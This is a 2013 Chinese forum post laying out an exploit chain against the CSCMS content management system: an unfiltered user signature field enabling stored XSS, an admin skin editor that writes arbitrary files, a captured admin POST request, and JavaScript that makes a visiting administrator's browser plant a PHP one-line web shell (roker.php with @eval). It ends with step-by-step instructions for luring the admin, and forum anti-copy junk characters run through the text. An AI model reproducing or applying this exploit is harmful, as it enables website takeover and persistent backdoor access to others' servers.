|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题/ U* \7 o; q- ?
官网已经修补了,所以重新下了源码
! k& j/ d2 H8 s- N; j因为 后台登入 还需要认证码 所以 注入就没看了。
5 w7 I1 N: W! w: D# v存在 xss
M0 H# O% f9 @4 e" `! v# C漏洞文件 user/member/skin_edit.php
4 _% d* C' j1 i) g3 t; D本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:( O' @9 x. g5 W7 S7 r4 i% |/ s
9 R" K; O) u% b8 p5 q% m& J* [
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>" v0 G, T8 d/ l! J* N
3 w) e! ^1 D- |* g3 N3 J</textarea></td></tr>; {% Z& N1 `8 Y. k8 L- B( o2 _8 {
. z+ I& Y; o; m( Z4 `! C
user/do.php
& c+ w0 H: @, x( ?9 i1 e0 s1 C& I$ v: G- {+ {; z
. A8 G% s2 X0 ?9 S7 Q
if($op=='zl'){ //资料
. X1 Y" v5 h3 X2 C # H O5 q$ g+ b& M8 C4 e/ |8 C6 ]0 E! O
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
) O2 Y9 ? w1 Z6 K+ G; }( S exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
- c3 r) e% ~, _# D4 K+ O , V. h5 t. `4 I
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
2 F7 B, T0 h' r$ U
5 T. x0 G- y( @5 D v CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
4 q# W" k l4 g' ^7 `9 A5 v where CS_Name='".$cscms_name."'";0 x7 b5 ^# \- y) z
, |9 m* Q! H" V* d7 h
if($db->query($sql)){: ~% w' f0 c+ E$ ]9 C
, G% N% p& m3 x- _& C. a
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));7 K1 m' D+ m" W* H5 r" G
) v" D7 {2 c( q* z+ T" O
}else{
' V: j5 G1 A- M0 I' [
' h; F2 \+ J* i' a exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));# X) p S- W1 f' m: k) O
4 M$ O) K' {( L
}/ v- e, O5 X" E5 ?; T
5 [5 Q t$ h* _6 ]5 s9 \) Q
7 Q9 _0 `! Y8 D! R% L% f没有 过滤导致xss产生。- m, X) f! o; K0 I2 ~7 E0 k
后台 看了下 很奇葩的是可以写任意格式文件。。1 |% W4 O* k7 g1 ~. g# p
抓包。。9 I6 l+ A& x" x
$ x8 }# O4 I- B5 E/ E5 B' K) }3 Y) O- @0 B# d* m* |
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.18 ]3 y5 @: \' D
8 M7 N- |4 A' N$ sAccept: text/html, application/xhtml+xml, */*
5 ~: r2 ^- R ^ + e" A% H8 ]7 @, N8 H7 _# x; f1 e% n
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php* j) @8 Z( n/ K4 X& H# v$ R+ J
4 ?; o: ?) y( `
Accept-Language: zh-CN4 }* U) z1 G1 B9 _
/ P6 R ]1 l/ G- J& `7 l e
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
0 i! u- E/ x! d% O* w- z
9 z. ^, f' P- p- Y" m4 u& Q, u) r; mContent-Type: application/x-www-form-urlencoded
# Y* C* ]3 P( k9 \ / H5 g/ ~. a' G5 r# a* }, o
Accept-Encoding: gzip, deflate
, U: ~ s' k: r0 T, x0 t & B8 m5 @( p5 J# c
Host: 127.0.0.1 L3 {; g! C' ^2 D# w8 @" u
$ W+ U3 v! H5 h; w( EContent-Length: 38
" G5 ~( K/ {+ Q; Y9 R% B; K
/ b6 X4 V# N6 j; {DNT: 1: Q- \) C) _% [2 I1 {
9 U. R4 f& F- n* {2 c/ R
Connection: Keep-Alive9 q" y# _% ^5 a# x+ M6 M) G' @
, h, j8 Q# ~$ b# ]Cache-Control: no-cache
6 n6 R$ P* W% ~ ( i% |% h2 P r3 H
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
% f- A0 d: _8 Y- l. b% d
4 T! [; |! Y" R6 S1 a, e* K2 p/ ?2 Q4 E* N$ W5 `0 t9 g5 P5 N
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
- q* I6 S- y' X5 m; }% S" B8 P; ?& h- N+ G1 ?9 v$ }+ f0 I8 ~# a% ^
3 P/ {; T8 d0 ]
* v/ M! g8 _: ]. [. P* F
于是 构造js如下。5 {) v1 o7 a: G5 U' ~+ K% z
2 Q" t8 f- F5 G% v+ q# D! C8 Q( N
本帖隐藏的内容<script>
U# }) U6 h* r# pthisTHost = top.location.hostname;
9 |- ?3 L7 {: v, L6 p; @5 M/ A9 A
, _" K- Y# ]; I& HthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";( p `, D9 Q6 J$ m
4 n0 I9 w* U/ Q8 H
function PostSubmit(url, data, msg) { 9 t! O# V* @; m. x0 @
var postUrl = url;
; b$ F1 x4 S3 p$ S' h. l ( ], P/ L0 U( O' O6 {
var postData = data; 5 O; u# W; Y: q+ h9 J% h
var msgData = msg; 7 [* e5 Z4 M9 N7 }
var ExportForm = document.createElement("FORM");
1 V9 ^) F* ?6 ]2 a3 W% i document.body.appendChild(ExportForm); `) L$ c, {: t+ J1 u+ c) s! [
ExportForm.method = "POST";
; k" S+ V9 ~- A8 {/ p- _. i! \, l var newElement = document.createElement("input"); ' }& Y5 x& Z5 Y2 r! t
newElement.setAttribute("name", "name"); # a) _0 G1 g6 y) J" B$ b2 _
newElement.setAttribute("type", "hidden");
% t+ Z- l2 {7 P$ } var newElement2 = document.createElement("input");
) s+ [. B( z& _& o. {0 x2 ]' g newElement2.setAttribute("name", "content");
5 f" S+ q: G7 G) N7 T' T newElement2.setAttribute("type", "hidden"); . j4 S$ ^5 ]' h8 s+ ], Y
ExportForm.appendChild(newElement); . ~4 t9 @( z/ g3 C
ExportForm.appendChild(newElement2); , t0 i, |* O/ d
newElement.value = postData;
- H4 _; S$ n0 u newElement2.value = msgData;
w% T+ w3 ]. j" ~$ D% e( Y ExportForm.action = postUrl; 5 q$ ]! A/ I( e; o* p+ z) {, Z) W( _
ExportForm.submit(); 5 e0 [, h' l0 ]( d: S! @; {, P
};- S$ K( r6 Z, z- f# @4 W1 _
+ t8 f3 Y& m w! N
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");7 x8 U9 `8 h. j
- K% c& e3 L |( M, m7 p4 s
</script>& O9 k& u6 z0 B( ^5 J4 ^# F/ k( {
; ]0 W6 Z' d. }4 n6 s% [) R
! w, x, t, n# t) F& f. q$ s
+ J# T; T8 O- d2 Vhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入3 |9 n3 J0 w# A3 M' }
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
1 x: u0 d% f) P5 |; e9 n; p就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
/ `$ s' ~( u% @% ]7 x3 B |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对